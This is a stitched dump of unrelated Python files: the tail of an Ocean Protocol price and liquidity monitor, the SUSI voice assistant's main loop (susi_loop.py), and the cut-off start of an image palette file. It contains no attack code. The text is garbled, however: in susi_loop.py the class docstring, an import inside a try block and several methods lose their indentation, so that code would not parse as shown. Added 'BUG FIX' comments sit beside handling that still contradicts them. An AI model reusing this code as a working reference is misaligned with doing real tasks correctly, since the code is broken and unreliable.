        f"value={price}, type=pool, address={pool_address}"
        f"isConsumable={is_consumable}. "
    )
    return {
        "datatoken": dt_reserve,
        "ocean": ocn_reserve,
        "value": price,
        "type": "pool",
        "address": pool_address,
        "pools": pools,
        "isConsumable": is_consumable,
    }
def do_single_update(self, asset):
    """Refresh price and datatoken info for one asset document.

    Prefers pool-based pricing; falls back to the fixed-rate exchange
    using the creator address from the asset's proof. Silently skips
    assets whose did does not carry the expected prefix.
    """
    did_prefix = self.DID_PREFIX
    prefix_len = len(did_prefix)
    did = asset["id"]
    if not did.startswith(did_prefix):
        return
    # the datatoken address is the did with the prefix stripped
    dt_address = add_0x_prefix(did[prefix_len:])
    _dt_address = self._web3.toChecksumAddress(dt_address)
    pools = self.get_datatoken_pools(dt_address, from_block=self.bfactory_block)
    if pools:
        logger.info(
            f"Found pools for asset with address={_dt_address}, "
            f"Updating price from LIQUIDITY AND PRICE."
        )
        price_dict = self._get_price_updates_from_liquidity(pools, _dt_address)
    else:
        owner = asset["proof"].get("creator")
        if not owner or not self._web3.isAddress(owner):
            logger.warning(
                f"updating price info for datatoken {dt_address} failed, invalid owner from ddo.proof (owner={owner})."
            )
            return
        logger.info(
            f"NO pools found for asset with address={_dt_address}. "
            f"Updating price from FIXED RATE EXCHANGE."
        )
        price_dict = self._get_price_updates_from_fixed_rate_exchange(
            dt_address, owner
        )
    asset["price"].update(price_dict)
    try:
        dt_info = get_datatoken_info(_dt_address)
    except Exception as e:
        # keep going with empty info rather than failing the whole update
        logger.error(
            f"getting datatoken info failed for datatoken {_dt_address}: {e}"
        )
        dt_info = {}
    asset["dataTokenInfo"] = dt_info
    logger.info(
        f"doing single asset update: datatoken {dt_address}, pools {pools}, price-info {price_dict}"
    )
    self._oceandb.update(asset, did)
def do_update(self):
    """Full refresh: recompute price info for every asset in the DB.

    Builds a datatoken -> pools map from all registered pools first,
    then updates each asset from its pools or, failing that, from the
    fixed-rate exchange.
    """
    did_prefix = self.DID_PREFIX
    prefix_len = len(did_prefix)
    pools = self.get_all_pools()
    dt_to_pool = dict()
    for pool_address in pools:
        pool = BPool(pool_address)
        try:
            ptokens = pool.getCurrentTokens()
        except Exception:
            continue
        # only 2-token pools with OCEAN as the second token are relevant
        if len(ptokens) != 2 or ptokens[1].lower() != self._OCEAN:
            continue
        dt = add_0x_prefix(ptokens[0]).lower()
        if dt not in dt_to_pool:
            dt_to_pool[dt] = []
        dt_to_pool[dt].append(pool_address)
    for asset in self._get_all_assets():
        did = asset.get("id", None)
        if not did:
            logger.debug(f"db asset without id: {asset}")
            continue
        if not did.startswith(did_prefix):
            logger.warning(
                f"skipping price info update for asset {did} because the did is invalid."
            )
            continue
        # datatoken address is the did minus the prefix
        dt_address = add_0x_prefix(did[prefix_len:])
        _dt_address = self._web3.toChecksumAddress(dt_address)
        dt_address = dt_address.lower()
        pools = dt_to_pool.get(dt_address, [])
        if not pools:
            logger.info(
                f"NO pools found for asset with address={_dt_address}. "
                f"Updating price from FIXED RATE EXCHANGE."
            )
            owner = asset["proof"].get("creator")
            if not owner or not self._web3.isAddress(owner):
                logger.warning(
                    f"updating price info for datatoken {dt_address} failed, invalid owner from ddo.proof (owner={owner})."
                )
                continue
            price_dict = self._get_price_updates_from_fixed_rate_exchange(
                _dt_address, owner
            )
        else:
            logger.info(
                f"Found pools for asset with address={_dt_address}, "
                f"Updating price from LIQUIDITY AND PRICE."
            )
            price_dict = self._get_price_updates_from_liquidity(pools, _dt_address)
        asset["price"].update(price_dict)
        try:
            dt_info = get_datatoken_info(_dt_address)
        except Exception as e:
            # keep going with empty info rather than failing the refresh
            logger.error(
                f"getting datatoken info failed for datatoken {_dt_address}: {e}"
            )
            dt_info = {}
        asset["dataTokenInfo"] = dt_info
        logger.info(
            f"updating price info for datatoken: {dt_address}, pools {pools}, price-info {price_dict}"
        )
        self._oceandb.update(asset, did)
def update_dt_assets_with_exchange_info(self, dt_address_exid):
    """Update assets' price info from `ExchangeCreated` event data.

    `dt_address_exid` holds (datatoken_address, exchangeId) tuples;
    duplicates per exchange are skipped, and assets already priced by a
    pool are left untouched.
    """
    did_prefix = self.DID_PREFIX
    dao = Dao(oceandb=self._oceandb)
    seen_exs = set()
    for address, exid in dt_address_exid:
        if not address or exid in seen_exs:
            continue
        seen_exs.add(exid)
        logger.info(
            f"updating price info for datatoken: {address}, exchangeId {exid}"
        )
        did = did_prefix + remove_0x_prefix(address)
        try:
            asset = dao.get(did)
            _price_dict = asset.get("price", {})
            _pools = _price_dict.get("pools", [])
            if _price_dict.get("type") == "pool" and _pools:
                # skip if the asset has pools
                continue
            _dt_address = self._web3.toChecksumAddress(address)
            logger.info(
                f"Found asset with exchange info address={_dt_address}, "
                "Updating price from FIXED RATE EXCHANGE. "
                "Not searching for pools."
            )
            price_dict = self._get_price_updates_from_fixed_rate_exchange(
                _dt_address, exchange_id=exid
            )
            asset["price"].update(price_dict)
            asset["dataTokenInfo"] = get_datatoken_info(_dt_address)
            self._oceandb.update(asset, did)
            logger.info(
                f"updated price info: dt={address}, exchangeAddress={self.ex_contract.address}, "
                f'exchangeId={exid}, price={asset["price"]}'
            )
        except Exception as e:
            # per-asset failures must not abort the whole batch
            logger.error(
                f"updating datatoken assets price values from exchange contract: {e}"
            )
def update_dt_assets(self, dt_address_pool_list):
    """Update price/liquidity info for assets affected by pool events.

    `dt_address_pool_list` holds (datatoken_address, pool_address)
    tuples; empty addresses are resolved from the pool's token list.
    Each affected asset gets refreshed price and datatoken info.
    """
    did_prefix = self.DID_PREFIX
    dao = Dao(oceandb=self._oceandb)
    # de-duplicate by pool and resolve missing datatoken addresses
    _dt_address_pool_list = []
    seen_pools = set()
    for address, pool_address in dt_address_pool_list:
        if pool_address in seen_pools:
            continue
        seen_pools.add(pool_address)
        if not address:
            address = BPool(pool_address).getCurrentTokens()[0]
        _dt_address_pool_list.append((address, pool_address))
    # group pool addresses per datatoken address
    dt_to_pools = {a: [] for a, p in _dt_address_pool_list}
    for address, pool_address in _dt_address_pool_list:
        dt_to_pools[address].append(pool_address)
    asset = None
    for address, pools in dt_to_pools.items():
        did = did_prefix + remove_0x_prefix(address)
        try:
            asset = dao.get(did)
        except Exception as e:
            logger.debug(f"asset not found for token address {address}: {e}")
            continue
        logger.info(f"updating price info for datatoken: {address}, pools {pools}")
        try:
            _price_dict = asset.get("price", {})
            _pools = _price_dict.get("pools", [])
            _dt_address = self._web3.toChecksumAddress(address)
            _pools.extend([p for p in pools if p not in _pools])
            logger.debug(f"Pools to be checked: {_pools}")
            logger.info(
                f"Found asset with exchange info address={_dt_address}, "
                "Updating price from LIQUIDITY AND PRICE. "
                f"Pools are assumed to exist ({len(_pools)}) found)."
            )
            price_dict = self._get_price_updates_from_liquidity(_pools, _dt_address)
            asset["price"].update(price_dict)
            asset["dataTokenInfo"] = get_datatoken_info(_dt_address)
            self._oceandb.update(asset, did)
            logger.info(
                # BUG FIX: this log line referenced `pool_address`, a stale
                # loop variable from the de-dup loop above (always the last
                # seen pool); report this asset's own pool list instead.
                f'updated price info: dt={address}, pools={_pools}, price={asset["price"]}'
            )
        except Exception as e:
            logger.error(f"updating datatoken assets price/liquidity values: {e}")
def process_pool_events(self):
    """Process chain events since the last processed block.

    Reads the checkpoint, scans pool and exchange logs up to the current
    block, updates affected assets, and advances the checkpoint only
    when the whole round succeeded.
    """
    try:
        last_block = self.get_last_processed_block()
    except Exception as e:
        # missing checkpoint (first run) -> start from genesis
        logger.warning(f"exception thrown reading last_block from db: {e}")
        last_block = 0
    block = self._web3.eth.blockNumber
    if not block or not isinstance(block, int) or block <= last_block:
        return
    from_block = last_block
    logger.debug(
        f"Price/Liquidity monitor >>>> from_block:{from_block}, current_block:{block} <<<<"
    )
    ok = False
    try:
        dt_address_pool_list = self.get_dt_addresses_from_pool_logs(
            from_block=from_block, to_block=block
        )
        self.update_dt_assets(dt_address_pool_list)
        dt_address_exchange = self.get_dt_addresses_from_exchange_logs(
            from_block=from_block, to_block=block
        )
        self.update_dt_assets_with_exchange_info(dt_address_exchange)
        ok = True
    except Exception as e:
        # NOTE(review): uses the root `logging` here but the module
        # `logger` everywhere else — presumably unintentional.
        logging.error(f"process_pool_events: {e}")
    finally:
        # only advance the checkpoint after a fully successful round
        if ok and isinstance(block, int):
            self.store_last_processed_block(block)
|
susi_loop.py | """
Processing logic of susi_linux
"""
import time
import os
import re
import logging
import queue
from threading import Thread, Timer, current_thread
from datetime import datetime
from urllib.parse import urljoin
import speech_recognition as sr
import requests
import json_config
import speech_recognition
from speech_recognition import Recognizer, Microphone
# from requests.exceptions import ConnectionError
from susi.config import SusiConfig
import susi.server_api as susi
from .hardware_components.lights import lights
from .internet_test import internet_on
from .action_scheduler import ActionScheduler
from .player import player
from .speech import TTS
logger = logging.getLogger(__name__)
try:
import RPi.GPIO as GPIO
except ImportError:
logger.warning("This device doesn't have GPIO port")
GPIO = None
class SusiLoop():
"""The main SUSI loop dealing with hotword detection, voice recognition,
server communication, action processing, etc"""
def __init__(self, renderer=None):
    """Set up recognizer, configuration, hotword engine, wake button and mic.

    :param renderer: optional UI renderer; it receives status messages and
        may also trigger the hotword callback through its subject.
    """
    if GPIO:
        try:
            GPIO.setmode(GPIO.BCM)
            GPIO.setup(27, GPIO.OUT)
            GPIO.setup(22, GPIO.OUT)
        except RuntimeError as e:
            logger.error(e)
    # thread1 = Thread(target=self.server_checker, name="ServerCheckerThread")
    # thread1.daemon = True
    # thread1.start()
    recognizer = Recognizer()
    # this was False in the old state machine, but reading the API docs
    # https://github.com/Uberi/speech_recognition/blob/master/reference/library-reference.rst
    # it seems that True is actually better!
    recognizer.dynamic_energy_threshold = True
    recognizer.energy_threshold = 2000
    self.recognizer = recognizer
    self.susi = susi
    self.renderer = renderer
    self.server_url = "https://127.0.0.1:4000"
    self.action_schduler = ActionScheduler()
    self.action_schduler.start()
    self.event_queue = queue.Queue()
    self.idle = True
    self.supported_languages = None
    self.hotword_thread = None
    self.queue_loop_thread = None
    try:
        # best-effort geolocation for location-aware answers
        res = requests.get('http://ip-api.com/json').json()
        self.susi.update_location(
            longitude=res['lon'], latitude=res['lat'],
            country_name=res['country'], country_code=res['countryCode'])
    except requests.exceptions.RequestException as e:
        # BUG FIX: `except ConnectionError` caught the *builtin* class;
        # requests' ConnectionError (its import is commented out above) is
        # not a subclass of it, so a network failure crashed the ctor.
        logger.error(e)
    self.susi_config = SusiConfig()
    self.path_base = self.susi_config.get('path.base')
    self.sound_detection = os.path.abspath(
        os.path.join(self.path_base,
                     self.susi_config.get('path.sound.detection')))
    self.sound_problem = os.path.abspath(
        os.path.join(self.path_base,
                     self.susi_config.get('path.sound.problem')))
    self.sound_error_recognition = os.path.abspath(
        os.path.join(self.path_base,
                     self.susi_config.get('path.sound.error.recognition')))
    self.sound_error_timeout = os.path.abspath(
        os.path.join(self.path_base,
                     self.susi_config.get('path.sound.error.timeout')))
    if self.susi_config.get('susi.mode') == 'authenticated':
        try:
            susi.sign_in(email=self.susi_config.get('susi.user'),
                         password=self.susi_config.get('susi.pass'))
        except Exception as e:
            logger.error('Some error occurred in login. Check you login details with susi-config.\n%s', e)
    if self.susi_config.get('hotword.engine') == 'Snowboy':
        from .hotword_engine.snowboy_detector import SnowboyDetector
        hotword_model = "susi.pmdl"
        if self.susi_config.get('hotword.model'):
            logger.debug("Using configured hotword model: " + self.susi_config.get('hotword.model'))
            # BUG FIX: this read the non-existent key 'hotword_model', so a
            # configured 'hotword.model' was never actually used.
            hotword_model = self.susi_config.get('hotword.model')
        self.hotword_detector = SnowboyDetector(model=hotword_model)
    elif self.susi_config.get('hotword.engine') == 'PocketSphinx':
        from .hotword_engine.sphinx_detector import PocketSphinxDetector
        self.hotword_detector = PocketSphinxDetector()
    elif self.susi_config.get('hotword.engine') == 'None':
        self.hotword_detector = None
    else:
        raise ValueError(f"Unrecognized value for hotword.engine: {self.susi_config.get('hotword.engine')}")
    if self.susi_config.get('wakebutton') == 'enabled':
        logger.info("Susi has the wake button enabled")
        if self.susi_config.get('device') == 'RaspberryPi':
            logger.info("Susi runs on a RaspberryPi")
            from .hardware_components.rpi_wake_button import RaspberryPiWakeButton
            self.wake_button = RaspberryPiWakeButton()
        else:
            logger.warning("Susi is not running on a RaspberryPi")
            self.wake_button = None
    else:
        logger.warning("Susi has the wake button disabled")
        self.wake_button = None
    stt = self.susi_config.get('stt')
    if stt == 'google' or stt == 'watson' or stt == 'bing':
        # for internet based services we assume any language supported
        self.supported_languages = None
    elif stt == 'pocketsphinx':
        # offline engines support only the languages shipped as data dirs
        ps_data_dir = os.path.join(os.path.dirname(os.path.realpath(speech_recognition.__file__)), "pocketsphinx-data")
        self.supported_languages = [f.name for f in os.scandir(ps_data_dir) if f.is_dir()]
        logger.debug(f"Found supported languages for PocketSphinx: {self.supported_languages}")
    elif stt == 'deepspeech-local':
        ps_data_dir = os.path.join(os.path.dirname(os.path.realpath(speech_recognition.__file__)), "deepspeech-data")
        self.supported_languages = [f.name for f in os.scandir(ps_data_dir) if f.is_dir()]
        logger.debug(f"Found supported languages for DeepSpeech: {self.supported_languages}")
    else:
        self.supported_languages = None
        # `logger.warn` is a deprecated alias of `warning`
        logger.warning(f"Unknown stt setting: {stt}")
    if self.susi_config.get('stt') == 'deepspeech-local':
        # DeepSpeech expects 16 kHz input
        self.microphone = Microphone(sample_rate=16000)
    else:
        self.microphone = Microphone()
    # hotword, wake button and renderer all funnel into the same callback
    if self.hotword_detector is not None:
        self.hotword_detector.subject.subscribe(
            on_next=lambda x: self.hotword_detected_callback())
    if self.wake_button is not None:
        self.wake_button.subject.subscribe(
            on_next=lambda x: self.hotword_detected_callback())
    if self.renderer is not None:
        self.renderer.subject.subscribe(
            on_next=lambda x: self.hotword_detected_callback())
    if self.action_schduler is not None:
        self.action_schduler.subject.subscribe(
            on_next=lambda x: self.queue_event(x))
def queue_event(self, event):
    """Queue a delayed/planned event for the queue loop to process."""
    self.event_queue.put(event)
def hotword_listener(self):
    """Thread function for listening to the hotword."""
    # this function never returns ...
    self.hotword_detector.start()
def server_checker(self):
    """Thread function polling the local SUSI server until it responds.

    Once the local server answers a test query, the susi API endpoint is
    switched over to it and the loop ends.
    """
    response_one = None
    test_params = {
        'q': 'Hello',
        'timezoneOffset': int(time.timezone / 60)
    }
    while response_one is None:
        try:
            logger.debug("checking for local server")
            url = urljoin(self.server_url, '/susi/chat.json')
            # BUG FIX: requests.get returns a Response, not a future; the
            # old `.result()` call always raised AttributeError, so the
            # loop could never terminate even with a reachable server.
            response_one = requests.get(url, params=test_params)
            api_endpoint = self.server_url
            susi.use_api_endpoint(api_endpoint)
        except requests.exceptions.ConnectionError:
            # builtin ConnectionError would NOT catch requests' variant
            time.sleep(10)
            continue
def start(self, background = False):
""" start processing of audio events """
self.start_hotword()
self.start_queue()
def is_queue_running(self):
return (self.queue_loop_thread and self.queue_loop_thread.is_alive())
def is_hotword_running(self):
return (self.hotword_thread and self.hotword_thread.is_alive())
def stop(self):
    """Stop hotword detection and (best-effort) the queue processing."""
    self.stop_hotword()
    self.stop_queue()
def start_queue(self, background = False):
    """Run the event-queue loop, optionally in a daemon thread.

    With background=False this call blocks the caller forever.
    """
    if background:
        self.queue_loop_thread = Thread(target=self.queue_loop, name="QueueLoopThread")
        self.queue_loop_thread.daemon = True
        self.queue_loop_thread.start()
    else:
        self.queue_loop()
def stop_queue(self):
    """Placeholder: the blocking queue loop cannot be stopped externally."""
    # cannot easily be implemented because python is stupid and doesn't allow
    # stopping thread ...
    pass
def start_hotword(self):
    """Start the hotword detector in a daemon thread, if one is configured."""
    if self.hotword_detector is not None:
        self.hotword_thread = Thread(target=self.hotword_listener, name="HotwordDetectorThread")
        self.hotword_thread.daemon = True
        self.hotword_thread.start()
def stop_hotword(self):
    """Stop the hotword detector and wait for its thread to finish."""
    if self.hotword_thread:
        self.hotword_detector.stop()
        self.hotword_thread.join()
def queue_loop(self):
    """Forever: take queued events and process each once the loop is idle."""
    while True:
        # block until events are available
        ev = self.event_queue.get(block = True)
        logger.debug("Got event from event queue, trying to deal with it")
        # wait until idle
        while True:
            logger.debug("Waiting to become idle for planned action")
            if not self.idle:
                # busy-wait (1s poll) until the current interaction ends
                time.sleep(1)
                continue
            logger.debug("We are idle now ...")
            self.idle = False
            self.deal_with_answer(ev)
            # back from processing
            player.restore_softvolume()
            if GPIO:
                try:
                    GPIO.output(27, False)
                    GPIO.output(22, False)
                except RuntimeError:
                    pass
            self.idle = True
            break
def notify_renderer(self, message, payload=None):
""" notify program renderer """
if self.renderer is not None:
self.renderer.receive_message(message, payload)
def hotword_detected_callback(self):
    """
    Callback when the hotword is detected. Does the full processing
    logic formerly contained in different states: beep, listen for a
    command, recognize it, and hand the text to deal_with_answer().
    """
    logger.debug("Entering hotword callback")
    # don't do anything if we are already busy
    if not self.idle:
        logger.debug("Callback called while already busy, returning immediately from callback")
        return
    logger.debug("We are idle, so work on it!")
    self.idle = False
    # beep to acknowledge the hotword
    player.beep(self.sound_detection)
    if GPIO:
        GPIO.output(22, True)
    audio = None
    logger.debug("notify renderer for listening")
    self.notify_renderer('listening')
    with self.microphone as source:
        try:
            logger.debug("listening to voice command")
            audio = self.recognizer.listen(source, timeout=10.0, phrase_time_limit=5)
        except sr.WaitTimeoutError:
            logger.debug("timeout reached waiting for voice command")
            self.deal_with_error('ListenTimeout')
            # brief delay before flipping back to idle, so the detector settles
            logger.debug("delaying idle setting for 0.05s")
            Timer(interval=0.05, function=self.set_idle).start()
            return
    if GPIO:
        GPIO.output(22, False)
    lights.off()
    lights.think()
    try:
        logger.debug("Converting audio to text")
        value = self.recognize_audio(audio=audio, recognizer=self.recognizer)
        logger.debug("recognize_audio => %s", value)
        self.notify_renderer('recognized', value)
        if self.deal_with_answer(value):
            pass
        else:
            logger.error("Error dealing with answer")
    except sr.UnknownValueError as e:
        logger.error("UnknownValueError from SpeechRecognition: %s", e)
        self.deal_with_error('RecognitionError')
    # in both success and recognition-error paths, return to idle shortly
    logger.debug("delaying idle setting for 0.05s")
    Timer(interval=0.05, function=self.set_idle).start()
    return
def set_idle(self):
    """Mark the loop idle again and tell the renderer."""
    logger.debug("Switching to idle mode")
    self.notify_renderer('idle')
    self.idle = True
def __speak(self, text):
"""Method to set the default TTS for the Speaker"""
tts = self.susi_config.get('tts')
if tts == 'google':
TTS.speak_google_tts(text)
elif tts == 'flite':
logger.info("Using flite for TTS") # indication for using an offline music player
TTS.speak_flite_tts(text)
elif tts == 'watson':
TTS.speak_watson_tts(text)
else:
raise ValueError("unknown key for tts", tts)
def recognize_audio(self, recognizer, audio):
    """Use the configured STT method to convert spoken audio to text.

    First adjusts the configured language to one the engine supports
    (exact match, then two-letter-prefix match, then a default), then
    dispatches to the engine-specific recognizer call.
    """
    stt = self.susi_config.get('stt')
    lang = self.susi_config.get('language')
    # Try to adjust language to what is available
    # None indicates any language supported, so use it as is
    if self.supported_languages is not None:
        if len(self.supported_languages) == 0:
            raise ValueError(f"No supported language for the current STT {stt}")
        if "en-US" in self.supported_languages:
            default = "en-US"
        else:
            default = self.supported_languages[0]
        if lang not in self.supported_languages:
            if len(lang) < 2:
                logger.warning(f"Unsupported language code {lang}, using {default}")
                lang = default
            else:
                langshort = lang[0:2].lower()
                for supported in self.supported_languages:
                    if langshort == supported[0:2].lower():
                        logger.debug(f"Using language code {supported} instead of {lang}")
                        lang = supported
                        break
            # We should now have a proper language code in lang, if not, warn and reset
            if lang not in self.supported_languages:
                logger.warning(f"Unsupported language code {lang}, using {default}")
                lang = default
    logger.info("Trying to recognize audio with %s in language: %s", stt, lang)
    if stt == 'google':
        return recognizer.recognize_google(audio, language=lang)
    elif stt == 'watson':
        username = self.susi_config.get('watson.stt.user')
        password = self.susi_config.get('watson.stt.pass')
        return recognizer.recognize_ibm(
            username=username, password=password, language=lang, audio_data=audio)
    elif stt in ('pocketsphinx', 'pocket_sphinx'):
        # BUG FIX: the rest of this file stores and checks the value
        # 'pocketsphinx' (see __init__ and deal_with_error); the old
        # 'pocket_sphinx'-only check never matched, so the configured
        # sphinx engine silently fell through to the DeepSpeech fallback.
        return recognizer.recognize_sphinx(audio, language=lang)
    elif stt == 'bing':
        api_key = self.susi_config.get('bing.api')
        return recognizer.recognize_bing(audio_data=audio, key=api_key, language=lang)
    elif stt == 'deepspeech-local':
        return self._recognize_deepspeech(recognizer, audio, lang)
    else:
        logger.error(f"Unknown STT setting: {stt}")
        logger.error("Using DeepSpeech!")
        return self._recognize_deepspeech(recognizer, audio, lang)

def _recognize_deepspeech(self, recognizer, audio, lang):
    """Run the local DeepSpeech recognizer with the configured model dir.

    Extracted helper: this code was duplicated verbatim in the
    'deepspeech-local' branch and the unknown-engine fallback.
    """
    ds_data_dir = os.path.abspath(
        os.path.join(
            self.susi_config.get('path.base'),
            self.susi_config.get('path.deepspeech'),
            lang))
    return recognizer.recognize_deepspeech(audio, language=lang, model_base_dir=ds_data_dir)
def deal_with_error(self, payload=None):
    """Play the right feedback sound/lights for an error condition.

    `payload` selects the error class: 'RecognitionError',
    'ConnectionError' (also switches to offline TTS/STT providers),
    'ListenTimeout', or anything else for the generic problem sound.
    """
    if payload == 'RecognitionError':
        logger.debug("ErrorState Recognition Error")
        self.notify_renderer('error', 'recognition')
        lights.speak()
        player.say(self.sound_error_recognition)
        lights.off()
    elif payload == 'ConnectionError':
        self.notify_renderer('error', 'connection')
        # no internet: fall back to offline providers
        self.susi_config.set('tts', 'flite')
        self.susi_config.set('stt', 'pocketsphinx')
        print("Internet Connection not available")
        lights.speak()
        lights.off()
        logger.info("Changed to offline providers")
    elif payload == 'ListenTimeout':
        self.notify_renderer('error', 'timeout')
        lights.speak()
        player.say(self.sound_error_timeout)
        lights.off()
    else:
        print("Error: {} \n".format(payload))
        self.notify_renderer('error')
        lights.speak()
        player.say(self.sound_problem)
        lights.off()
def deal_with_answer(self, payload=None):
    """Processing logic - how to deal with answers from the server.

    `payload` is either a query string (sent to the susi server) or an
    already-resolved planned-action reply dict. Handles planned actions,
    volume/media/stop commands, the spoken answer, language switching,
    media playback, tables and RSS entries.

    Returns True on success, False on connection or unexpected errors.
    """
    try:
        no_answer_needed = False
        if isinstance(payload, str):
            logger.debug("Sending payload to susi server: %s", payload)
            reply = self.susi.ask(payload)
        else:
            logger.debug("Executing planned action response: %s", payload)
            reply = payload
        if GPIO:
            GPIO.output(27, True)
        self.notify_renderer('speaking', payload={'susi_reply': reply})
        #if 'meta_action' in reply.keys():
        #    if reply['meta_action'] == "pause-voice":
        if 'planned_actions' in reply.keys():
            logger.debug("planning action: ")
            for plan in reply['planned_actions']:
                logger.debug("plan = " + str(plan))
                # plan answers look like this:
                # plan = {'planned_actions': [{'language': 'en', 'answer': 'ALARM', 'plan_delay': 300001,
                # 'plan_date': '2020-01-09T02:05:10.377Z'}], 'language': 'en', 'answer': 'alarm set for in 5 minutes'}
                # we use time.time as timefunc for scheduler, so we need to convert the
                # delay and absolute time to the same format, that is float of sec since epoch
                # Unfortunately, Python is tooooooo stupid to provide ISO standard confirm standard
                # library. datetime.fromisoformat sounds like perfectly made, only that it doesn't
                # parse the Z postfix, congratulations.
                # https://discuss.python.org/t/parse-z-timezone-suffix-in-datetime/2220
                # Replace it manually with +00:00
                # We send both the delay and absolute time in case one of the two is missing
                # the scheduler prefers the delay value
                plan_date_sec = datetime.fromisoformat(re.sub('Z$', '+00:00', plan['plan_date'])).timestamp()
                self.action_schduler.add_event(int(plan['plan_delay']) / 1000, plan_date_sec, plan)
        # first responses WITHOUT answer key!
        # {'answer': 'Audio volume is now 10 percent.', 'volume': '10'}
        if 'volume' in reply.keys():
            no_answer_needed = True
            player.volume(reply['volume'])
            player.say(self.sound_detection)
        if 'media_action' in reply.keys():
            action = reply['media_action']
            if action == 'pause':
                no_answer_needed = True
                player.pause()
                lights.off()
                lights.wakeup()
            elif action == 'resume':
                no_answer_needed = True
                player.resume()
            elif action == 'restart':
                no_answer_needed = True
                player.restart()
            elif action == 'next':
                no_answer_needed = True
                player.next()
            elif action == 'previous':
                no_answer_needed = True
                player.previous()
            elif action == 'shuffle':
                no_answer_needed = True
                player.shuffle()
            else:
                logger.error('Unknown media action: %s', action)
        # {'stop': <susi_python.models.StopAction object at 0x7f4641598d30>}
        if 'stop' in reply.keys():
            no_answer_needed = True
            player.stop()
        if 'answer' in reply.keys():
            logger.info('Susi: %s', reply['answer'])
            lights.off()
            lights.speak()
            self.__speak(reply['answer'])
            lights.off()
        else:
            # only complain when no command above consumed the reply and
            # it is not a media identifier (handled below)
            if not no_answer_needed and 'identifier' not in reply.keys():
                lights.off()
                lights.speak()
                self.__speak("I don't have an answer to this")
                lights.off()
        if 'language' in reply.keys():
            answer_lang = reply['language']
            if answer_lang != self.susi_config.get("language"):
                logger.info("Switching language to: %s", answer_lang)
                # switch language
                self.susi_config.set('language', answer_lang)
        # answer to "play ..."
        # {'identifier': 'ytd-04854XqcfCY', 'answer': 'Playing Queen - We Are The Champions (Official Video)'}
        if 'identifier' in reply.keys():
            url = reply['identifier']
            logger.debug("Playing " + url)
            if url[:3] == 'ytd':
                player.playytb(url[4:])
            else:
                player.play(url)
        if 'table' in reply.keys():
            table = reply['table']
            for h in table.head:
                print('%s\t' % h, end='')
                self.__speak(h)
            print()
            # speak only the first few rows to keep the answer short
            for datum in table.data[0:4]:
                for value in datum:
                    print('%s\t' % value, end='')
                    self.__speak(value)
                print()
        if 'rss' in reply.keys():
            rss = reply['rss']
            entities = rss['entities']
            count = rss['count']
            for entity in entities[0:count]:
                logger.debug(entity.title)
                self.__speak(entity.title)
    except ConnectionError:
        self.deal_with_error('ConnectionError')
        return False
    except Exception as e:
        logger.error('Unknown error: %s', e)
        return False
    return True
|
image.py | import numpy as np
from PIL import Image
import torch
import threading
_palette = [
0, 0, 0, 128, 0, 0, 0, 128, 0, 128, 128, 0, 0, 0, 128, 128, 0, 128, 0, 128,
128, 128, 128, 128, 64, 0, 0, 191, 0, 0, 64, 128, 0, 191, 128, 0, 64, 0,
128, 191, 0, 128, 64, 128, 128, 191, 128, 128, 0, 64, 0, 128, 64, 0, 0,
191, 0, 128, 191, 0, 0, 64, 128, 128, 64, 128, 22, 22, 22, 23, 23, 23, 24,
24, 24, 25, 25, 25, 26, 26, 26, 27, 27, 27, 28, 28, 28, 29, 29, 29, 30, 30,
30, 31, 31, 31, 32, 32, 32, 33, 33, 33, 34, 34, 34, 35, 35, 35, 36, 36, 36,
37, 37, 37, 38, 38, 38, 39, 39, 39, 40, 40, 40, 41, 41, 41, 42, 42, 42, 43,
43, 43, 44, 44, 44, 45, 45, 45, 46, 46, 46, 47, 47, 47, 48, 48, 48, 49, 49,
49, 50, 50, 50, 51, 51, 51, 52, 52, 52, 53, 53, 53, 54, 54, 54, 55, 55, 55,
56, 56, 56, 57, 57, 57, 58, 58, 58, 59, 59, 59, 60, 60, 60, 61, 61, 61, 62,
62, 62, 63, 63, 63, 64, 64, 64, 65, 65, 65, 66, 66, 66, 67, 67, 67, 68, 68,
68, 69, 69, 69, 70, 70, 70, 71, 71, 71, 72, 72, 72, 73, 73, 73, 74, 74, 74,
75, 75, 75, 76, 76, 76, 77, 77, 77, 78, 78, 78, 79, 79, 79, 80, 80, 80, 81,
81, 81, 82, 82, 82, 83, 83, 83, 84, 84, 84, 85, 85, 85, 86, 86, 86, 87, 87,
87, 88, 88, 88, 89, 89, 89, 90, 90, 90, 91, 91, 91, 92, 92, 92, 93, 93, 93,
94, 94, 94, 95, 95, 95, 96, 96, 96, 97, 97, 97, 98, 98, 98, 99, 99, 99,
100, 100, 100, 101, 101, 101, 102, 102, 102, 103, 103, 103, 104, 104, 104,
105, 105, 105, 106, 106, 106, 107, 107, 107, 108, 108, 108, 109, 109, 109,
110, 110, 110, 111, 111, 111, 112, 112, 112, 113, 113, 113, 114, 114, 114,
115, 115, 115, 116, 116, 116, 117, 117, 117, 118, 118, 118, 119, 119, 119,
120, 120, 120, 121, 121, 121, 122, 122, 122, 123, 123, 123, 124, 124, 124,
125, 125, 125, 126, 126, 126, 127, 127, 127, 128, 128, 128, 129, 129, 129,
130, 130, 130, 131, 131, 131, 132, 132, 132, 133, 133, 133, 134, 134, 134,
135, 135, 135, 136, 136, 136, 137, 137, 137, 138, 138, 138, 139, 139, 139,
140, 140, 140, 141, 141, 141, 142, 142, 142, 143, 143, 143, 144, 144, 144,
145, 145, 145, 146, 146, 146, 147, 147, 147, 148, 148, 148, 149, 149, 149,
150, 150, 150, 151, 151, 151, 152, 152, 152, 153, 153, 153, 154, 154, 154,
155, 155, 155, 156, 156, 156, 157, 157, 157, 158, 158, 158, 159, 159, 159,
160, 160, 160, 161, 161, 161, 162, 162, 162, 163, 163, 163, 164, 164, 164,
165, 165, 165, 166, 166, 166, 167, 167, 167, 168, 168, 168, 169, 169, 169,
170, 170, 170, 171, 171, 171, 172, 172, 172, 173, 173, 173, 174, 174, 174,
175, 175, 175, 176, 176, 176, 177, 177, 177, 178, 178, 178, 179, 179, 179,
180, 180, 180, 181, 181, 181, 182, 182, 182, 183, 183, 183, 184, 184, 184,
185, 185, 185, 186, 186, 186, 187, 187, 187, 188, 188, 188, 189, 189, 189,
190, 190, 190, 191, 191, 191, 192, 192, 192, 193, 193, 193, 194, 194, 194,
195, 195, 195, 196, 196, 196, 197, 197, 197, 198, 198, 198, 199, 199, 199,
200, 200, 200, 201, 201, 201, 202, 202, 202, 203, 203, 203, 204, 204, 204,
205, 205, 205, 206, 206, 206, 207, 207, 207, 208, 208, 208, 209, 209, 209,
210, 210, 210, 211, 211, 211, 212, 212, 212, 213, 213, 213, 214, 214, 214,
215, 215, 215, 216, 216, 216, 217, 217, 217, 218, 218, 218, 219, 219, 219,
